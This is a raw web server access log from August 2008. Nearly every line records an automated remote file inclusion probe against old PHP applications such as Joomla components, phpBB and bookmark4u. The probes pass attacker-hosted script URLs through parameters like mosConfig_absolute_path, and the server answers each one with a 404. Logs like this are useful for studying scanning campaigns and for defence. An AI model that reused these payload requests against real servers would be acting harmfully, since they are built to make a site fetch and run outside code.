151.64.167.56 - - [24/Aug/2008:07:09:49 -0500] "GET /logs/access_log.1216425600//modules/cjaycontent/admin/editor2/errors.php?error=http://africa-success.net/administrator/components/com_remository/idwi.txt?? HTTP/1.1" 404 356 "-""Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
151.64.167.56 - - [24/Aug/2008:07:09:52 -0500] "GET /logs/access_log.1208736000//modules/cjaycontent/admin/editor2/errors.php?error=http://africa-success.net/administrator/components/com_remository/idwi.txt?? HTTP/1.1" 404 356 "-""Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
151.64.167.56 - - [24/Aug/2008:07:09:56 -0500] "GET /logs/access_log.1214265600//modules/cjaycontent/admin/editor2/errors.php?error=http://africa-success.net/administrator/components/com_remository/idwi.txt?? HTTP/1.1" 404 356 "-""Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
151.64.167.56 - - [24/Aug/2008:07:10:05 -0500] "GET /logs/access_log.1212192000//modules/cjaycontent/admin/editor2/errors.php?error=http://africa-success.net/administrator/components/com_remository/idwi.txt?? HTTP/1.1" 404 356 "-""Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
151.64.167.56 - - [24/Aug/2008:07:11:17 -0500] "GET //modules/cjaycontent/admin/editor2/errors.php?error=http://arabhack.fateback.com/kngid.txt????? HTTP/1.1" 404 329 "-""libwww-perl/5.79"
151.64.167.56 - - [24/Aug/2008:07:12:23 -0500] "GET //modules/cjaycontent/admin/editor2/errors.php?error=http://arabhack.fateback.com/kngid.txt????? HTTP/1.1" 404 329 "-""libwww-perl/5.79"
69.94.70.15 - - [24/Aug/2008:07:13:27 -0500] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.teamprobes.net/id.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.65"
69.94.70.15 - - [24/Aug/2008:07:13:27 -0500] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.teamprobes.net/id.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.65"
74.55.246.194 - - [24/Aug/2008:07:15:25 -0500] "GET /logs/access_log.1214179200/bookmark4u/lostpasswd.php?env[include_prefix]=http://www.yallaweb.net/images/grey/tbl/DEVILS/help.txt? HTTP/1.1" 404 336 "-""libwww-perl/5.814"
74.55.246.194 - - [24/Aug/2008:07:15:25 -0500] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://www.yallaweb.net/images/grey/tbl/DEVILS/help.txt? HTTP/1.1" 404 309 "-""libwww-perl/5.814"
74.55.246.194 - - [24/Aug/2008:07:15:25 -0500] "GET /logs/bookmark4u/lostpasswd.php?env[include_prefix]=http://www.yallaweb.net/images/grey/tbl/DEVILS/help.txt? HTTP/1.1" 404 314 "-""libwww-perl/5.814"
91.200.212.3 - - [24/Aug/2008:07:15:28 -0500] "GET /logs/access_log.1206230400//skin/zero_vote/error.php?dir=http://www.tiibetinspanielit.fi/forum/ids.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.803"
91.200.212.3 - - [24/Aug/2008:07:15:29 -0500] "GET //skin/zero_vote/error.php?dir=http://www.tiibetinspanielit.fi/forum/ids.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.803"
91.200.212.3 - - [24/Aug/2008:07:15:29 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.tiibetinspanielit.fi/forum/ids.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.803"
195.56.111.194 - - [24/Aug/2008:07:15:45 -0500] "GET /logs//src/browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://www.pixmag.co.za/templates/rt_replicant/rokzoom/images/idd.txt??? HTTP/1.1" 404 350 "-""libwww-perl/5.810"
195.56.111.194 - - [24/Aug/2008:07:15:45 -0500] "GET //src/browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://www.pixmag.co.za/templates/rt_replicant/rokzoom/images/idd.txt??? HTTP/1.1" 404 345 "-""libwww-perl/5.810"
74.55.246.194 - - [24/Aug/2008:07:16:22 -0500] "GET /logs/access_log.1214179200/bookmark4u/lostpasswd.php?env[include_prefix]=http://www.yallaweb.net/images/grey/tbl/DEVILS/help.txt? HTTP/1.1" 404 336 "-""libwww-perl/5.814"
74.55.246.194 - - [24/Aug/2008:07:16:22 -0500] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://www.yallaweb.net/images/grey/tbl/DEVILS/help.txt? HTTP/1.1" 404 309 "-""libwww-perl/5.814"
74.55.246.194 - - [24/Aug/2008:07:16:23 -0500] "GET /logs/bookmark4u/lostpasswd.php?env[include_prefix]=http://www.yallaweb.net/images/grey/tbl/DEVILS/help.txt? HTTP/1.1" 404 314 "-""libwww-perl/5.814"
91.200.212.3 - - [24/Aug/2008:07:17:10 -0500] "GET /logs/access_log.1201564800//skin/zero_vote/error.php?dir=http://www.tiibetinspanielit.fi/forum/ids.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.803"
80.248.180.182 - - [24/Aug/2008:07:19:01 -0500] "GET /logs/access_log.1206230400//skin/zero_vote/error.php?dir=http://www.sldating.fr/idd.txt? HTTP/1.1" 404 336 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
80.248.180.182 - - [24/Aug/2008:07:19:01 -0500] "GET //skin/zero_vote/error.php?dir=http://www.sldating.fr/idd.txt? HTTP/1.1" 404 309 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
80.248.180.182 - - [24/Aug/2008:07:19:18 -0500] "GET /logs/access_log.1206230400//skin/zero_vote/error.php?dir=http://www.sldating.fr/idd.txt? HTTP/1.1" 404 336 "-""libwww-perl/5.79"
80.248.180.182 - - [24/Aug/2008:07:19:18 -0500] "GET //skin/zero_vote/error.php?dir=http://www.sldating.fr/idd.txt? HTTP/1.1" 404 309 "-""libwww-perl/5.79"
80.248.180.182 - - [24/Aug/2008:07:19:19 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.sldating.fr/idd.txt? HTTP/1.1" 404 314 "-""libwww-perl/5.79"
80.248.180.182 - - [24/Aug/2008:07:19:51 -0500] "GET /logs/access_log.1201564800//skin/zero_vote/error.php?dir=http://www.sldating.fr/idd.txt? HTTP/1.1" 404 336 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
80.248.180.182 - - [24/Aug/2008:07:20:22 -0500] "GET /logs/access_log.1201564800//skin/zero_vote/error.php?dir=http://www.sldating.fr/idd.txt? HTTP/1.1" 404 336 "-""libwww-perl/5.79"
84.21.71.133 - - [24/Aug/2008:07:20:39 -0500] "GET /admin/editor2/errors.php?error=http://paginas.terra.com.br/lazer/xfatalzinhox/id3.txt??? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
84.21.71.133 - - [24/Aug/2008:07:20:40 -0500] "GET /logs/admin/editor2/errors.php?error=http://paginas.terra.com.br/lazer/xfatalzinhox/id3.txt??? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
84.21.71.133 - - [24/Aug/2008:07:20:40 -0500] "GET /logs/access_log.1208044800/admin/editor2/errors.php?error=http://paginas.terra.com.br/lazer/xfatalzinhox/id3.txt??? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
80.248.180.182 - - [24/Aug/2008:07:20:54 -0500] "GET //skin/zero_vote/error.php?dir=http://www.sldating.fr/idd.txt? HTTP/1.1" 404 309 "-""libwww-perl/5.79"
80.248.180.182 - - [24/Aug/2008:07:21:14 -0500] "GET /logs/access_log.1206230400//skin/zero_vote/error.php?dir=http://www.sldating.fr/idd.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.79"
80.248.180.182 - - [24/Aug/2008:07:21:14 -0500] "GET //skin/zero_vote/error.php?dir=http://www.sldating.fr/idd.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.79"
80.248.180.182 - - [24/Aug/2008:07:21:17 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.sldating.fr/idd.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.79"
65.55.230.165 - - [24/Aug/2008:07:21:40 -0500] "GET /logs/access_log.1164153600 HTTP/1.1" 200 154902 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
67.202.88.42 - - [24/Aug/2008:07:22:13 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.topyn.com/ips.txt? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
67.202.88.42 - - [24/Aug/2008:07:22:13 -0500] "GET //skin/zero_vote/error.php?dir=http://www.topyn.com/ips.txt? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
80.248.180.182 - - [24/Aug/2008:07:22:20 -0500] "GET /logs/access_log.1201564800//skin/zero_vote/error.php?dir=http://www.sldating.fr/idd.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.79"
80.248.180.182 - - [24/Aug/2008:07:23:18 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.sldating.fr/idd.txt? HTTP/1.1" 404 314 "-""libwww-perl/5.79"
80.248.180.182 - - [24/Aug/2008:07:23:18 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.sldating.fr/idd.txt? HTTP/1.1" 404 314 "-""libwww-perl/5.79"
80.248.180.182 - - [24/Aug/2008:07:23:18 -0500] "GET //skin/zero_vote/error.php?dir=http://www.sldating.fr/idd.txt? HTTP/1.1" 404 309 "-""libwww-perl/5.79"
80.248.180.182 - - [24/Aug/2008:07:23:18 -0500] "GET //skin/zero_vote/error.php?dir=http://www.sldating.fr/idd.txt? HTTP/1.1" 404 309 "-""libwww-perl/5.79"
69.94.70.15 - - [24/Aug/2008:07:26:14 -0500] "GET /logs/errors.php?error=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt? HTTP/1.1" 404 299 "-""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
69.94.70.15 - - [24/Aug/2008:07:26:14 -0500] "GET /errors.php?error=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt? HTTP/1.1" 404 294 "-""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
62.87.154.41 - - [24/Aug/2008:07:26:36 -0500] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.geocities.com/cripya/header.jpg? HTTP/1.1" 404 321 "-""libwww-perl/5.803"
62.87.154.41 - - [24/Aug/2008:07:26:36 -0500] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.geocities.com/cripya/header.jpg? HTTP/1.1" 404 316 "-""libwww-perl/5.803"
91.200.212.3 - - [24/Aug/2008:07:27:01 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.tiibetinspanielit.fi/forum/ids.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.803"
91.200.212.3 - - [24/Aug/2008:07:27:01 -0500] "GET //skin/zero_vote/error.php?dir=http://www.tiibetinspanielit.fi/forum/ids.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.803"
151.64.167.56 - - [24/Aug/2008:07:27:14 -0500] "GET //modules/cjaycontent/admin/editor2/errors.php?error=http://arabhack.fateback.com/kngid.txt????? HTTP/1.1" 404 329 "-""libwww-perl/5.79"
80.248.180.182 - - [24/Aug/2008:07:30:01 -0500] "GET /logs//errors.php?error=http://www.sldating.fr/idd.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.79"
80.248.180.182 - - [24/Aug/2008:07:30:07 -0500] "GET //errors.php?error=http://www.sldating.fr/idd.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.79"
151.64.167.56 - - [24/Aug/2008:07:30:49 -0500] "GET /logs/access_log.1208044800//modules/cjaycontent/admin/editor2/errors.php?error=http://arabhack.fateback.com/kngid.txt????? HTTP/1.1" 404 356 "-""libwww-perl/5.79"
151.64.167.56 - - [24/Aug/2008:07:30:52 -0500] "GET //modules/cjaycontent/admin/editor2/errors.php?error=http://arabhack.fateback.com/kngid.txt????? HTTP/1.1" 404 329 "-""libwww-perl/5.79"
151.64.167.56 - - [24/Aug/2008:07:30:53 -0500] "GET /logs//modules/cjaycontent/admin/editor2/errors.php?error=http://arabhack.fateback.com/kngid.txt????? HTTP/1.1" 404 334 "-""libwww-perl/5.79"
151.64.167.56 - - [24/Aug/2008:07:30:59 -0500] "GET /logs/access_log.1208044800//modules/cjaycontent/admin/editor2/errors.php?error=http://arabhack.fateback.com/kngid.txt????? HTTP/1.1" 404 356 "-""libwww-perl/5.79"
151.64.167.56 - - [24/Aug/2008:07:30:59 -0500] "GET //modules/cjaycontent/admin/editor2/errors.php?error=http://arabhack.fateback.com/kngid.txt????? HTTP/1.1" 404 329 "-""libwww-perl/5.79"
151.64.167.56 - - [24/Aug/2008:07:31:00 -0500] "GET /logs//modules/cjaycontent/admin/editor2/errors.php?error=http://arabhack.fateback.com/kngid.txt????? HTTP/1.1" 404 334 "-""libwww-perl/5.79"
151.64.167.56 - - [24/Aug/2008:07:32:08 -0500] "GET /logs//modules/cjaycontent/admin/editor2/errors.php?error=http://arabhack.fateback.com/kngid.txt????? HTTP/1.1" 404 334 "-""libwww-perl/5.79"
151.64.167.56 - - [24/Aug/2008:07:32:09 -0500] "GET //modules/cjaycontent/admin/editor2/errors.php?error=http://arabhack.fateback.com/kngid.txt????? HTTP/1.1" 404 329 "-""libwww-perl/5.79"
77.221.130.6 - - [24/Aug/2008:07:32:14 -0500] "GET /logs//index.php?DOCUMENT_ROOT=http://www.sldating.fr/idd.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.803"
77.221.130.6 - - [24/Aug/2008:07:32:14 -0500] "GET //index.php?DOCUMENT_ROOT=http://www.sldating.fr/idd.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.803"
67.19.90.90 - - [24/Aug/2008:07:32:21 -0500] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.marioni.info/id.txt??? HTTP/1.1" 404 333 "-""libwww-perl/5.811"
67.19.90.90 - - [24/Aug/2008:07:32:21 -0500] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.marioni.info/id.txt??? HTTP/1.1" 404 328 "-""libwww-perl/5.811"
65.254.58.42 - - [24/Aug/2008:07:32:23 -0500] "GET /logs/access_log.1214179200/bookmark4u/lostpasswd.php?env[include_prefix]=http://www.all-cs.ru/sistem.gif? HTTP/1.1" 404 336 "-""libwww-perl/5.811"
65.254.58.42 - - [24/Aug/2008:07:32:23 -0500] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://www.all-cs.ru/sistem.gif? HTTP/1.1" 404 309 "-""libwww-perl/5.811"
65.254.58.42 - - [24/Aug/2008:07:32:23 -0500] "GET /logs/bookmark4u/lostpasswd.php?env[include_prefix]=http://www.all-cs.ru/sistem.gif? HTTP/1.1" 404 314 "-""libwww-perl/5.811"
62.87.154.41 - - [24/Aug/2008:07:32:30 -0500] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.geocities.com/cripya/header.jpg? HTTP/1.1" 404 316 "-""libwww-perl/5.803"
77.221.130.6 - - [24/Aug/2008:07:32:34 -0500] "GET /logs//index.php?DOCUMENT_ROOT=http://www.sldating.fr/idd.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.803"
77.221.130.6 - - [24/Aug/2008:07:32:35 -0500] "GET //index.php?DOCUMENT_ROOT=http://www.sldating.fr/idd.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.803"
65.254.58.42 - - [24/Aug/2008:07:32:39 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.all-cs.ru/sistem.gif? HTTP/1.1" 404 307 "-""libwww-perl/5.811"
65.254.58.42 - - [24/Aug/2008:07:32:39 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.all-cs.ru/sistem.gif? HTTP/1.1" 404 302 "-""libwww-perl/5.811"
65.254.58.42 - - [24/Aug/2008:07:32:46 -0500] "GET /logs/access_log.1214179200/bookmark4u/lostpasswd.php?env[include_prefix]=http://www.all-cs.ru/sistem.gif? HTTP/1.1" 404 336 "-""libwww-perl/5.811"
65.254.58.42 - - [24/Aug/2008:07:32:46 -0500] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://www.all-cs.ru/sistem.gif? HTTP/1.1" 404 309 "-""libwww-perl/5.811"
65.254.58.42 - - [24/Aug/2008:07:32:46 -0500] "GET /logs/bookmark4u/lostpasswd.php?env[include_prefix]=http://www.all-cs.ru/sistem.gif? HTTP/1.1" 404 314 "-""libwww-perl/5.811"
74.52.99.98 - - [24/Aug/2008:07:32:47 -0500] "GET /logs/access_log.1206230400//skin/zero_vote/error.php?dir=http://clubmusic.caucasus.net/V7ID.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.810"
74.52.99.98 - - [24/Aug/2008:07:32:47 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://clubmusic.caucasus.net/V7ID.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.810"
74.52.99.98 - - [24/Aug/2008:07:32:47 -0500] "GET //skin/zero_vote/error.php?dir=http://clubmusic.caucasus.net/V7ID.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.810"
74.52.99.98 - - [24/Aug/2008:07:32:52 -0500] "GET /logs/access_log.1201564800//skin/zero_vote/error.php?dir=http://clubmusic.caucasus.net/V7ID.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.810"
74.6.8.121 - - [24/Aug/2008:07:33:32 -0500] "GET /logs/access_log.1195603200 HTTP/1.0" 200 270970 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.19.90.90 - - [24/Aug/2008:07:33:36 -0500] "GET /logs/akocomments.php?mosConfig_absolute_path=http://www.marioni.info/id.txt??? HTTP/1.1" 404 304 "-""libwww-perl/5.811"
67.19.90.90 - - [24/Aug/2008:07:33:36 -0500] "GET /akocomments.php?mosConfig_absolute_path=http://www.marioni.info/id.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.811"
77.221.130.6 - - [24/Aug/2008:07:34:42 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.sldating.fr/idd.txt? HTTP/1.1" 404 307 "-""libwww-perl/5.803"
77.221.130.6 - - [24/Aug/2008:07:34:42 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.sldating.fr/idd.txt? HTTP/1.1" 404 302 "-""libwww-perl/5.803"
209.217.116.153 - - [24/Aug/2008:07:34:53 -0500] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.marioni.info/id.txt??? HTTP/1.1" 404 333 "-""libwww-perl/5.79"
209.217.116.153 - - [24/Aug/2008:07:34:55 -0500] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.marioni.info/id.txt??? HTTP/1.1" 404 328 "-""libwww-perl/5.79"
77.221.130.6 - - [24/Aug/2008:07:35:29 -0500] "GET /logs//errors.php/error=http://www.sldating.fr/idd.txt? HTTP/1.1" 404 337 "-""libwww-perl/5.803"
77.221.130.6 - - [24/Aug/2008:07:35:30 -0500] "GET //errors.php/error=http://www.sldating.fr/idd.txt? HTTP/1.1" 404 332 "-""libwww-perl/5.803"
67.19.90.90 - - [24/Aug/2008:07:36:30 -0500] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.marioni.info/id.txt??? HTTP/1.1" 404 333 "-""libwww-perl/5.811"
67.19.90.90 - - [24/Aug/2008:07:36:30 -0500] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.marioni.info/id.txt??? HTTP/1.1" 404 328 "-""libwww-perl/5.811"
217.172.186.250 - - [24/Aug/2008:07:37:04 -0500] "GET /logs/access_log.1214524800//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.yallaweb.net/images/grey/tbl/DEVILS/help.txt? HTTP/1.1" 404 355 "-""libwww-perl/5.803"
217.172.186.250 - - [24/Aug/2008:07:37:05 -0500] "GET //modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.yallaweb.net/images/grey/tbl/DEVILS/help.txt? HTTP/1.1" 404 328 "-""libwww-perl/5.803"
217.172.186.250 - - [24/Aug/2008:07:37:05 -0500] "GET /logs//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.yallaweb.net/images/grey/tbl/DEVILS/help.txt? HTTP/1.1" 404 333 "-""libwww-perl/5.803"
209.217.116.153 - - [24/Aug/2008:07:37:11 -0500] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.marioni.info/id.txt??? HTTP/1.1" 404 333 "-""libwww-perl/5.79"
209.217.116.153 - - [24/Aug/2008:07:37:16 -0500] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.marioni.info/id.txt??? HTTP/1.1" 404 328 "-""libwww-perl/5.79"
77.221.130.6 - - [24/Aug/2008:07:37:25 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.sldating.fr/idd.txt? HTTP/1.1" 404 307 "-""libwww-perl/5.803"
77.221.130.6 - - [24/Aug/2008:07:37:25 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.sldating.fr/idd.txt? HTTP/1.1" 404 302 "-""libwww-perl/5.803"
84.21.71.133 - - [24/Aug/2008:07:37:30 -0500] "GET /logs/access_log.1206230400/modules/My_eGallery/public/errors.php?error=http://paginas.terra.com.br/lazer/xfatalzinhox/id3.txt??? HTTP/1.1" 404 348 "-""libwww-perl/5.805"
84.21.71.133 - - [24/Aug/2008:07:37:31 -0500] "GET /modules/My_eGallery/public/errors.php?error=http://paginas.terra.com.br/lazer/xfatalzinhox/id3.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
84.21.71.133 - - [24/Aug/2008:07:37:31 -0500] "GET /logs/modules/My_eGallery/public/errors.php?error=http://paginas.terra.com.br/lazer/xfatalzinhox/id3.txt??? HTTP/1.1" 404 326 "-""libwww-perl/5.805"
213.248.62.98 - - [24/Aug/2008:07:39:50 -0500] "GET /errors.php?error=http://fratore.altervista.org/ufficio/tommy.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
213.248.62.98 - - [24/Aug/2008:07:39:50 -0500] "GET /logs/errors.php?error=http://fratore.altervista.org/ufficio/tommy.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
217.198.149.178 - - [24/Aug/2008:07:40:57 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://frauenaerzte-bamberg.de/news/parse/v6id.txt?? HTTP/1.1" 404 327 "-""libwww-perl/5.810"
217.198.149.178 - - [24/Aug/2008:07:40:57 -0500] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://frauenaerzte-bamberg.de/news/parse/v6id.txt?? HTTP/1.1" 404 322 "-""libwww-perl/5.810"
77.221.130.6 - - [24/Aug/2008:07:41:36 -0500] "GET /logs//errors.php/error=http://www.sldating.fr/idd.txt? HTTP/1.1" 404 337 "-""libwww-perl/5.803"
77.221.130.6 - - [24/Aug/2008:07:41:36 -0500] "GET //errors.php/error=http://www.sldating.fr/idd.txt? HTTP/1.1" 404 332 "-""libwww-perl/5.803"
89.111.184.180 - - [24/Aug/2008:07:41:39 -0500] "GET /logs/errors.php?error=http://fratore.altervista.org/ufficio/tommy.txt? HTTP/1.1" 404 299 "-""Mozilla/3.0 (OS/2; U)"
89.111.184.180 - - [24/Aug/2008:07:41:39 -0500] "GET /errors.php?error=http://fratore.altervista.org/ufficio/tommy.txt? HTTP/1.1" 404 294 "-""Mozilla/3.0 (OS/2; U)"
219.117.239.114 - - [24/Aug/2008:07:42:06 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.zyssetd.ch/.../test.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.65"
219.117.239.114 - - [24/Aug/2008:07:42:07 -0500] "GET //skin/zero_vote/error.php?dir=http://www.zyssetd.ch/.../test.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.65"
67.19.90.90 - - [24/Aug/2008:07:42:27 -0500] "GET /logs/akocomments.php?mosConfig_absolute_path=http://www.marioni.info/id.txt??? HTTP/1.1" 404 304 "-""libwww-perl/5.811"
67.19.90.90 - - [24/Aug/2008:07:42:27 -0500] "GET /akocomments.php?mosConfig_absolute_path=http://www.marioni.info/id.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.811"
195.56.111.194 - - [24/Aug/2008:07:42:29 -0500] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.pixmag.co.za/templates/rt_replicant/rokzoom/images/idd.txt??? HTTP/1.1" 404 338 "-""libwww-perl/5.810"
195.56.111.194 - - [24/Aug/2008:07:42:29 -0500] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.pixmag.co.za/templates/rt_replicant/rokzoom/images/idd.txt??? HTTP/1.1" 404 333 "-""libwww-perl/5.810"
195.56.111.194 - - [24/Aug/2008:07:42:29 -0500] "GET /logs/access_log.1209600000//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.pixmag.co.za/templates/rt_replicant/rokzoom/images/idd.txt??? HTTP/1.1" 404 360 "-""libwww-perl/5.810"
195.56.111.194 - - [24/Aug/2008:07:42:47 -0500] "GET /logs/access_log.1203724800//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.pixmag.co.za/templates/rt_replicant/rokzoom/images/idd.txt??? HTTP/1.1" 404 360 "-""libwww-perl/5.810"
64.22.89.194 - - [24/Aug/2008:07:44:08 -0500] "GET /logs/lang_main_album.php?phpbb_root_path=http://secret-admirer.info/scan/id.txt?? HTTP/1.1" 404 308 "-""libwww-perl/5.812"
64.22.89.194 - - [24/Aug/2008:07:44:08 -0500] "GET /logs/lang_main_album.php?phpbb_root_path=http://secret-admirer.info/scan/id.txt?? HTTP/1.1" 404 308 "-""libwww-perl/5.812"
64.22.89.194 - - [24/Aug/2008:07:44:08 -0500] "GET /lang_main_album.php?phpbb_root_path=http://secret-admirer.info/scan/id.txt?? HTTP/1.1" 404 303 "-""libwww-perl/5.812"
64.22.89.194 - - [24/Aug/2008:07:44:08 -0500] "GET /lang_main_album.php?phpbb_root_path=http://secret-admirer.info/scan/id.txt?? HTTP/1.1" 404 303 "-""libwww-perl/5.812"
67.19.90.90 - - [24/Aug/2008:07:45:11 -0500] "GET /logs/access_log.1206230400/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.marioni.info/id.txt??? HTTP/1.1" 404 355 "-""libwww-perl/5.811"
67.19.90.90 - - [24/Aug/2008:07:45:11 -0500] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.marioni.info/id.txt??? HTTP/1.1" 404 328 "-""libwww-perl/5.811"
67.19.90.90 - - [24/Aug/2008:07:45:12 -0500] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.marioni.info/id.txt??? HTTP/1.1" 404 333 "-""libwww-perl/5.811"
219.117.239.114 - - [24/Aug/2008:07:46:47 -0500] "GET /logs/access_log.1206230400//skin/zero_vote/error.php?dir=http://www.zyssetd.ch/.../test.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.65"
74.6.8.121 - - [24/Aug/2008:07:46:55 -0500] "GET /logs/access_log.1206403200 HTTP/1.0" 200 275345 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
64.22.89.194 - - [24/Aug/2008:07:47:51 -0500] "GET /lang_main_album.php?phpbb_root_path=http://secret-admirer.info/scan/id.txt?? HTTP/1.1" 404 303 "-""libwww-perl/5.812"
219.117.239.114 - - [24/Aug/2008:07:47:59 -0500] "GET /logs/access_log.1201564800//skin/zero_vote/error.php?dir=http://www.zyssetd.ch/.../test.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.65"
77.221.130.3 - - [24/Aug/2008:07:48:24 -0500] "GET /logs/access_log.1206230400//modules/My_eGallery/public/displayCategory.php?basepath=http://www.jorvani.com/subastas/includes/images/idnews.txt? HTTP/1.1" 404 358 "-""libwww-perl/5.803"
77.221.130.3 - - [24/Aug/2008:07:48:24 -0500] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://www.jorvani.com/subastas/includes/images/idnews.txt? HTTP/1.1" 404 331 "-""libwww-perl/5.803"
77.221.130.3 - - [24/Aug/2008:07:48:24 -0500] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://www.jorvani.com/subastas/includes/images/idnews.txt? HTTP/1.1" 404 336 "-""libwww-perl/5.803"
77.221.130.3 - - [24/Aug/2008:07:48:31 -0500] "GET /logs/access_log.1206230400//modules/My_eGallery/public/displayCategory.php?basepath=http://www.jorvani.com/subastas/includes/images/idnews.txt? HTTP/1.1" 404 358 "-""libwww-perl/5.803"
77.221.130.3 - - [24/Aug/2008:07:48:31 -0500] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://www.jorvani.com/subastas/includes/images/idnews.txt? HTTP/1.1" 404 331 "-""libwww-perl/5.803"
77.221.130.3 - - [24/Aug/2008:07:48:31 -0500] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://www.jorvani.com/subastas/includes/images/idnews.txt? HTTP/1.1" 404 336 "-""libwww-perl/5.803"
